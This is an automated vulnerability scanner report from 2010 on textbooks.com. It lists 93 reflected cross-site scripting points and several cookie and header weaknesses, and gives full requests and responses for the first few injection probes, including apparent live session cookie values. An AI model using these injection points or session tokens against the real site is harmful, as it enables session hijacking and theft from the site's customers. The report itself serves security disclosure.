textbooks.com, XSS, Cross Site Scripting, CWe-79, CAPEC-86

Cross Site Scripting in textbooks.com | Vulnerability Crawler Report

Report generated by XSS.CX at Mon Dec 27 10:33:14 CST 2010.


Contents

1. Cross-site scripting (reflected)


Contents

Loading

1.1. http://www.textbooks.com/Author/Peter_Vorderer.php [REST URL parameter 1]

1.2. http://www.textbooks.com/Author/Peter_Vorderer.php [REST URL parameter 2]

1.3. http://www.textbooks.com/BooksDescription.php [REST URL parameter 1]

1.4. http://www.textbooks.com/BuyBack-Search.php [REST URL parameter 1]

1.5. http://www.textbooks.com/Cart.php [REST URL parameter 1]

1.6. http://www.textbooks.com/Catalog/A/Agriculture-and-Animal-Sciences.php [REST URL parameter 1]

1.7. http://www.textbooks.com/Catalog/A/Agriculture-and-Animal-Sciences.php [REST URL parameter 3]

1.8. http://www.textbooks.com/Catalog/B/Business-and-Economics.php [REST URL parameter 1]

1.9. http://www.textbooks.com/Catalog/B/Business-and-Economics.php [REST URL parameter 3]

1.10. http://www.textbooks.com/Catalog/C/Communication-and-Media.php [REST URL parameter 1]

1.11. http://www.textbooks.com/Catalog/C/Communication-and-Media.php [REST URL parameter 3]

1.12. http://www.textbooks.com/Catalog/D/Computer-Science-and-Technology.php [REST URL parameter 1]

1.13. http://www.textbooks.com/Catalog/D/Computer-Science-and-Technology.php [REST URL parameter 3]

1.14. http://www.textbooks.com/Catalog/E/Education.php [REST URL parameter 1]

1.15. http://www.textbooks.com/Catalog/E/Education.php [REST URL parameter 3]

1.16. http://www.textbooks.com/Catalog/G/History-and-Geography.php [REST URL parameter 1]

1.17. http://www.textbooks.com/Catalog/G/History-and-Geography.php [REST URL parameter 3]

1.18. http://www.textbooks.com/Catalog/H/Arts-and-Humanities.php [REST URL parameter 1]

1.19. http://www.textbooks.com/Catalog/H/Arts-and-Humanities.php [REST URL parameter 3]

1.20. http://www.textbooks.com/Catalog/HQL/General-Video-Titles.php [REST URL parameter 1]

1.21. http://www.textbooks.com/Catalog/HQL/General-Video-Titles.php [REST URL parameter 3]

1.22. http://www.textbooks.com/Catalog/J/Law-and-Criminal-Justice.php [REST URL parameter 1]

1.23. http://www.textbooks.com/Catalog/J/Law-and-Criminal-Justice.php [REST URL parameter 3]

1.24. http://www.textbooks.com/Catalog/L/Languages-and-Literature.php [REST URL parameter 1]

1.25. http://www.textbooks.com/Catalog/L/Languages-and-Literature.php [REST URL parameter 3]

1.26. http://www.textbooks.com/Catalog/M/Math-and-Science.php [REST URL parameter 1]

1.27. http://www.textbooks.com/Catalog/M/Math-and-Science.php [REST URL parameter 3]

1.28. http://www.textbooks.com/Catalog/P/Medicine.php [REST URL parameter 1]

1.29. http://www.textbooks.com/Catalog/P/Medicine.php [REST URL parameter 3]

1.30. http://www.textbooks.com/Catalog/R/Reference-Materials.php [REST URL parameter 1]

1.31. http://www.textbooks.com/Catalog/R/Reference-Materials.php [REST URL parameter 3]

1.32. http://www.textbooks.com/Catalog/S/Social-Sciences.php [REST URL parameter 1]

1.33. http://www.textbooks.com/Catalog/S/Social-Sciences.php [REST URL parameter 3]

1.34. http://www.textbooks.com/Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php [REST URL parameter 1]

1.35. http://www.textbooks.com/Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php [REST URL parameter 3]

1.36. http://www.textbooks.com/Catalog/V/Vocational-and-Professional-Education.php [REST URL parameter 1]

1.37. http://www.textbooks.com/Catalog/V/Vocational-and-Professional-Education.php [REST URL parameter 3]

1.38. http://www.textbooks.com/CustServ-Contact.php [REST URL parameter 1]

1.39. http://www.textbooks.com/CustServ-FAQ.php [REST URL parameter 1]

1.40. http://www.textbooks.com/CustServ-Home.php [REST URL parameter 1]

1.41. http://www.textbooks.com/CustServ-HowToShop.php [REST URL parameter 1]

1.42. http://www.textbooks.com/CustServ-Privacy.php [REST URL parameter 1]

1.43. http://www.textbooks.com/CustServ-ShippingPolicy.php [REST URL parameter 1]

1.44. http://www.textbooks.com/CustServ-Terms.php [REST URL parameter 1]

1.45. http://www.textbooks.com/CustServ-WhyTB.php [REST URL parameter 1]

1.46. http://www.textbooks.com/ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php [REST URL parameter 1]

1.47. http://www.textbooks.com/ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php [REST URL parameter 4]

1.48. http://www.textbooks.com/Search.php [REST URL parameter 1]

1.49. http://www.textbooks.com/affiliates.php [REST URL parameter 1]

1.50. http://www.textbooks.com/buy-textbooks.php [REST URL parameter 1]

1.51. http://www.textbooks.com/css/prod5.css [REST URL parameter 1]

1.52. http://www.textbooks.com/css/prod5.css [REST URL parameter 2]

1.53. http://www.textbooks.com/css/tb-v3.css [REST URL parameter 1]

1.54. http://www.textbooks.com/css/tb-v3.css [REST URL parameter 2]

1.55. http://www.textbooks.com/custserv-intprop.php [REST URL parameter 1]

1.56. http://www.textbooks.com/custserv-whatisused.php [REST URL parameter 1]

1.57. http://www.textbooks.com/etextbooks.php [REST URL parameter 1]

1.58. http://www.textbooks.com/financial-aid-tips.php [REST URL parameter 1]

1.59. http://www.textbooks.com/js/browse.js [REST URL parameter 1]

1.60. http://www.textbooks.com/js/browse.js [REST URL parameter 2]

1.61. http://www.textbooks.com/js/jquery-1.3.2.js [REST URL parameter 1]

1.62. http://www.textbooks.com/js/jquery-1.3.2.js [REST URL parameter 2]

1.63. http://www.textbooks.com/js/main.js [REST URL parameter 1]

1.64. http://www.textbooks.com/js/main.js [REST URL parameter 2]

1.65. http://www.textbooks.com/js/php.js [REST URL parameter 1]

1.66. http://www.textbooks.com/js/php.js [REST URL parameter 2]

1.67. http://www.textbooks.com/js/s_code.js [REST URL parameter 1]

1.68. http://www.textbooks.com/js/s_code.js [REST URL parameter 2]

1.69. http://www.textbooks.com/js/tbcart-ajax.js [REST URL parameter 1]

1.70. http://www.textbooks.com/js/tbcart-ajax.js [REST URL parameter 2]

1.71. http://www.textbooks.com/modcss.php [REST URL parameter 1]

1.72. http://www.textbooks.com/rent-textbooks.php [REST URL parameter 1]

1.73. http://www.textbooks.com/sell-textbooks.php [REST URL parameter 1]

1.74. http://www.textbooks.com/used-textbooks.php [REST URL parameter 1]

1.75. https://www.textbooks.com/account.php [REST URL parameter 1]

1.76. https://www.textbooks.com/checkout.php [REST URL parameter 1]

1.77. https://www.textbooks.com/css/tb-v3.css [REST URL parameter 1]

1.78. https://www.textbooks.com/css/tb-v3.css [REST URL parameter 2]

1.79. https://www.textbooks.com/js/browse.js [REST URL parameter 1]

1.80. https://www.textbooks.com/js/browse.js [REST URL parameter 2]

1.81. https://www.textbooks.com/js/jquery-1.3.2.js [REST URL parameter 1]

1.82. https://www.textbooks.com/js/jquery-1.3.2.js [REST URL parameter 2]

1.83. https://www.textbooks.com/js/main.js [REST URL parameter 1]

1.84. https://www.textbooks.com/js/main.js [REST URL parameter 2]

1.85. https://www.textbooks.com/js/php.js [REST URL parameter 1]

1.86. https://www.textbooks.com/js/php.js [REST URL parameter 2]

1.87. https://www.textbooks.com/js/s_code.js [REST URL parameter 1]

1.88. https://www.textbooks.com/js/s_code.js [REST URL parameter 2]

1.89. https://www.textbooks.com/js/tbcart-ajax.js [REST URL parameter 1]

1.90. https://www.textbooks.com/js/tbcart-ajax.js [REST URL parameter 2]

1.91. https://www.textbooks.com/modcss.php [REST URL parameter 1]

1.92. http://www.textbooks.com/Cart.php [Referer HTTP header]

1.93. https://www.textbooks.com/checkout.php [Referer HTTP header]

2. SSL cookie without secure flag set

2.1. https://www.textbooks.com/

2.2. https://www.textbooks.com/account.php

2.3. https://www.textbooks.com/checkout.php

3. Cookie scoped to parent domain

3.1. http://www.textbooks.com/

3.2. http://www.textbooks.com/Author/Peter_Vorderer.php

3.3. http://www.textbooks.com/BooksDescription.php

3.4. http://www.textbooks.com/BuyBack-Search.php

3.5. http://www.textbooks.com/Cart.php

3.6. http://www.textbooks.com/Catalog/A/Agriculture-and-Animal-Sciences.php

3.7. http://www.textbooks.com/Catalog/B/Business-and-Economics.php

3.8. http://www.textbooks.com/Catalog/C/Communication-and-Media.php

3.9. http://www.textbooks.com/Catalog/D/Computer-Science-and-Technology.php

3.10. http://www.textbooks.com/Catalog/E/Education.php

3.11. http://www.textbooks.com/Catalog/G/History-and-Geography.php

3.12. http://www.textbooks.com/Catalog/H/Arts-and-Humanities.php

3.13. http://www.textbooks.com/Catalog/HQL/General-Video-Titles.php

3.14. http://www.textbooks.com/Catalog/J/Law-and-Criminal-Justice.php

3.15. http://www.textbooks.com/Catalog/L/Languages-and-Literature.php

3.16. http://www.textbooks.com/Catalog/M/Math-and-Science.php

3.17. http://www.textbooks.com/Catalog/P/Medicine.php

3.18. http://www.textbooks.com/Catalog/R/Reference-Materials.php

3.19. http://www.textbooks.com/Catalog/S/Social-Sciences.php

3.20. http://www.textbooks.com/Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php

3.21. http://www.textbooks.com/Catalog/V/Vocational-and-Professional-Education.php

3.22. http://www.textbooks.com/ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php

3.23. http://www.textbooks.com/buy-textbooks.php

3.24. http://www.textbooks.com/etextbooks.php

3.25. http://www.textbooks.com/rent-textbooks.php

3.26. http://www.textbooks.com/sell-textbooks.php

3.27. https://www.textbooks.com/

3.28. https://www.textbooks.com/account.php

3.29. https://www.textbooks.com/checkout.php

4. Cookie without HttpOnly flag set

4.1. http://www.textbooks.com/

4.2. http://www.textbooks.com/Author/Peter_Vorderer.php

4.3. http://www.textbooks.com/BooksDescription.php

4.4. http://www.textbooks.com/BuyBack-Search.php

4.5. http://www.textbooks.com/Cart.php

4.6. http://www.textbooks.com/Catalog/A/Agriculture-and-Animal-Sciences.php

4.7. http://www.textbooks.com/Catalog/B/Business-and-Economics.php

4.8. http://www.textbooks.com/Catalog/C/Communication-and-Media.php

4.9. http://www.textbooks.com/Catalog/D/Computer-Science-and-Technology.php

4.10. http://www.textbooks.com/Catalog/E/Education.php

4.11. http://www.textbooks.com/Catalog/G/History-and-Geography.php

4.12. http://www.textbooks.com/Catalog/H/Arts-and-Humanities.php

4.13. http://www.textbooks.com/Catalog/HQL/General-Video-Titles.php

4.14. http://www.textbooks.com/Catalog/J/Law-and-Criminal-Justice.php

4.15. http://www.textbooks.com/Catalog/L/Languages-and-Literature.php

4.16. http://www.textbooks.com/Catalog/M/Math-and-Science.php

4.17. http://www.textbooks.com/Catalog/P/Medicine.php

4.18. http://www.textbooks.com/Catalog/R/Reference-Materials.php

4.19. http://www.textbooks.com/Catalog/S/Social-Sciences.php

4.20. http://www.textbooks.com/Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php

4.21. http://www.textbooks.com/Catalog/V/Vocational-and-Professional-Education.php

4.22. http://www.textbooks.com/ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php

4.23. http://www.textbooks.com/buy-textbooks.php

4.24. http://www.textbooks.com/etextbooks.php

4.25. http://www.textbooks.com/rent-textbooks.php

4.26. http://www.textbooks.com/sell-textbooks.php

4.27. https://www.textbooks.com/

4.28. https://www.textbooks.com/account.php

4.29. https://www.textbooks.com/checkout.php

5. Password field with autocomplete enabled

6. Cross-domain Referer leakage

6.1. http://www.textbooks.com/BooksDescription.php

6.2. http://www.textbooks.com/js/browse.js

6.3. https://www.textbooks.com/js/browse.js

7. Cross-domain script include

7.1. http://www.textbooks.com/

7.2. http://www.textbooks.com/Author/Peter_Vorderer.php

7.3. http://www.textbooks.com/BooksDescription.php

7.4. http://www.textbooks.com/BuyBack-Search.php

7.5. http://www.textbooks.com/Cart.php

7.6. http://www.textbooks.com/Catalog/A/Agriculture-and-Animal-Sciences.php

7.7. http://www.textbooks.com/Catalog/B/Business-and-Economics.php

7.8. http://www.textbooks.com/Catalog/C/Communication-and-Media.php

7.9. http://www.textbooks.com/Catalog/D/Computer-Science-and-Technology.php

7.10. http://www.textbooks.com/Catalog/E/Education.php

7.11. http://www.textbooks.com/Catalog/G/History-and-Geography.php

7.12. http://www.textbooks.com/Catalog/H/Arts-and-Humanities.php

7.13. http://www.textbooks.com/Catalog/HQL/General-Video-Titles.php

7.14. http://www.textbooks.com/Catalog/J/Law-and-Criminal-Justice.php

7.15. http://www.textbooks.com/Catalog/L/Languages-and-Literature.php

7.16. http://www.textbooks.com/Catalog/M/Math-and-Science.php

7.17. http://www.textbooks.com/Catalog/P/Medicine.php

7.18. http://www.textbooks.com/Catalog/R/Reference-Materials.php

7.19. http://www.textbooks.com/Catalog/S/Social-Sciences.php

7.20. http://www.textbooks.com/Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php

7.21. http://www.textbooks.com/Catalog/V/Vocational-and-Professional-Education.php

7.22. http://www.textbooks.com/CustServ-Contact.php

7.23. http://www.textbooks.com/CustServ-FAQ.php

7.24. http://www.textbooks.com/CustServ-Home.php

7.25. http://www.textbooks.com/CustServ-HowToShop.php

7.26. http://www.textbooks.com/CustServ-Privacy.php

7.27. http://www.textbooks.com/CustServ-ShippingPolicy.php

7.28. http://www.textbooks.com/CustServ-Terms.php

7.29. http://www.textbooks.com/CustServ-WhyTB.php

7.30. http://www.textbooks.com/ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php

7.31. http://www.textbooks.com/Search.php

7.32. http://www.textbooks.com/affiliates.php

7.33. http://www.textbooks.com/buy-textbooks.php

7.34. http://www.textbooks.com/custserv-intprop.php

7.35. http://www.textbooks.com/custserv-whatisused.php

7.36. http://www.textbooks.com/etextbooks.php

7.37. http://www.textbooks.com/financial-aid-tips.php

7.38. http://www.textbooks.com/rent-textbooks.php

7.39. http://www.textbooks.com/sell-textbooks.php

7.40. http://www.textbooks.com/used-textbooks.php

7.41. https://www.textbooks.com/

7.42. https://www.textbooks.com/account.php

7.43. https://www.textbooks.com/checkout.php

8. Email addresses disclosed

8.1. http://www.textbooks.com/CustServ-Privacy.php

8.2. http://www.textbooks.com/affiliates.php

8.3. http://www.textbooks.com/custserv-intprop.php

9. Cacheable HTTPS response

9.1. https://www.textbooks.com/

9.2. https://www.textbooks.com/account.php

9.3. https://www.textbooks.com/checkout.php

10. HTML does not specify charset

10.1. http://www.textbooks.com/

10.2. http://www.textbooks.com/Author/Peter_Vorderer.php

10.3. http://www.textbooks.com/BooksDescription.php

10.4. http://www.textbooks.com/BuyBack-Search.php

10.5. http://www.textbooks.com/Cart.php

10.6. http://www.textbooks.com/Catalog/A/Agriculture-and-Animal-Sciences.php

10.7. http://www.textbooks.com/Catalog/B/Business-and-Economics.php

10.8. http://www.textbooks.com/Catalog/C/Communication-and-Media.php

10.9. http://www.textbooks.com/Catalog/D/Computer-Science-and-Technology.php

10.10. http://www.textbooks.com/Catalog/E/Education.php

10.11. http://www.textbooks.com/Catalog/G/History-and-Geography.php

10.12. http://www.textbooks.com/Catalog/H/Arts-and-Humanities.php

10.13. http://www.textbooks.com/Catalog/HQL/General-Video-Titles.php

10.14. http://www.textbooks.com/Catalog/J/Law-and-Criminal-Justice.php

10.15. http://www.textbooks.com/Catalog/L/Languages-and-Literature.php

10.16. http://www.textbooks.com/Catalog/M/Math-and-Science.php

10.17. http://www.textbooks.com/Catalog/P/Medicine.php

10.18. http://www.textbooks.com/Catalog/R/Reference-Materials.php

10.19. http://www.textbooks.com/Catalog/S/Social-Sciences.php

10.20. http://www.textbooks.com/Catalog/T/Architecture-Engineering-Manufacture-and-Transport.php

10.21. http://www.textbooks.com/Catalog/V/Vocational-and-Professional-Education.php

10.22. http://www.textbooks.com/CustServ-Contact.php

10.23. http://www.textbooks.com/CustServ-FAQ.php

10.24. http://www.textbooks.com/CustServ-Home.php

10.25. http://www.textbooks.com/CustServ-HowToShop.php

10.26. http://www.textbooks.com/CustServ-Privacy.php

10.27. http://www.textbooks.com/CustServ-ShippingPolicy.php

10.28. http://www.textbooks.com/CustServ-Terms.php

10.29. http://www.textbooks.com/CustServ-WhyTB.php

10.30. http://www.textbooks.com/ISBN/9780805853223/Peter-Vorderer/Playing-Video-Games_-_0805853227.php

10.31. http://www.textbooks.com/Search.php

10.32. http://www.textbooks.com/affiliates.php

10.33. http://www.textbooks.com/buy-textbooks.php

10.34. http://www.textbooks.com/custserv-intprop.php

10.35. http://www.textbooks.com/custserv-whatisused.php

10.36. http://www.textbooks.com/etextbooks.php

10.37. http://www.textbooks.com/financial-aid-tips.php

10.38. http://www.textbooks.com/rent-textbooks.php

10.39. http://www.textbooks.com/sell-textbooks.php

10.40. http://www.textbooks.com/used-textbooks.php

10.41. https://www.textbooks.com/

10.42. https://www.textbooks.com/account.php

10.43. https://www.textbooks.com/checkout.php



1. Cross-site scripting (reflected)  next
There are 93 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.textbooks.com/Author/Peter_Vorderer.php [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Author/Peter_Vorderer.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f117d'%3b70a1f109c52 was submitted in the REST URL parameter 1. This input was echoed as f117d';70a1f109c52 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Authorf117d'%3b70a1f109c52/Peter_Vorderer.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3641
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:51 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
rchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Authorf117d';70a1f109c52/Peter_Vorderer.php'

</script>
...[SNIP]...

1.2. http://www.textbooks.com/Author/Peter_Vorderer.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Author/Peter_Vorderer.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac74d'%3b4c3476296cf was submitted in the REST URL parameter 2. This input was echoed as ac74d';4c3476296cf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Author/ac74d'%3b4c3476296cf HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3623
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:52 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Author/ac74d';4c3476296cf'

</script>
...[SNIP]...

1.3. http://www.textbooks.com/BooksDescription.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /BooksDescription.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b6b9'%3b8382c7dc55e was submitted in the REST URL parameter 1. This input was echoed as 1b6b9';8382c7dc55e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /BooksDescription.php1b6b9'%3b8382c7dc55e HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
